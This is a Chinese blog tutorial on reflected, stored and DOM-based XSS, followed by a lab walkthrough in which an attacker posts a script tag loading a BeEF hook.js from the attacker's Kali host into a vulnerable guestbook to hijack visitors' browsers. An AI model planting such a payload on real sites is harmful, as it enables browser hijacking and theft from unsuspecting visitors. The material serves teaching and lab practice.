XSS的简单攻击

xss的分类1

第一种:反射型xss

反射型XSS是最简单的XSS,即输入XSS脚本或输入XSS脚本点击按钮即可完成XSS攻击,同时也称作非持久型XSS。漏洞主要存在于URL地址栏,搜索框等。

第二种:存储型XSS

也叫持久型XSS,主要将XSS代码提交存储在服务器端,下次请求目标页面时不用在提交XSS代码。当目标用户访问该页面获取数据时,XSS代码会从服务器解析之后加载出来,返回到浏览器做正常的HTML和JS解析执行,XSS攻击就发生了。该类型的漏洞主要存在于发帖,回帖评论等模块,以及用户注册等模块。

第三种:DOM-based型XSS攻击

基于DOM的XSS攻击是指通过恶意脚本修改页面的DOM结构,是纯粹发生在客户端的攻击。DOM 型 XSS 攻击中,取出和执行恶意代码由浏览器端完成,属于前端 JavaScript 自身的安全漏洞。

xss原理1

1.反射型XSS

通过在页面上植入恶意链接,诱使用户点击,执行js脚本,所谓反射型XSS就是将用户输入的数据,反射到浏览器执行。

2.存储型XSS

此类XSS漏洞是指,用户输入的数据(恶意代码)可以“存储”在服务端,只要有人访问这个包含有存储型XSS代码的页面,XSS脚本就会在他们的浏览器中执行,这种XSS具有很强的稳定性。

3.DOM型XSS

DOM Based XSS漏洞是基于文档对象模型的一种漏洞。DOM是有个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。类似于反射型XSS,但是,这种XSS攻击的实现是通过对DOM的修改实现的。

实验部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。

1、利用AWVS扫描留言簿网站,发现存在XSS漏洞。

在这里插入图片描述

2、在Kali中使用beef生成代码。

启动beef成功后
在这里插入图片描述
利用beef生成代码
在这里插入图片描述

3、访问http://留言簿网站/message.asp;将以下代码写入网站留言板,
<script src="http://Kali的ip地址:3000/hook.js"></script>

在这里插入图片描述
写入成功

4、管理员登录login.htm,审核用户留言。

只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持。
在这里插入图片描述
攻击发起后客户端进入的页面
在这里插入图片描述


  1. 来源于网上 ↩︎ ↩︎

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值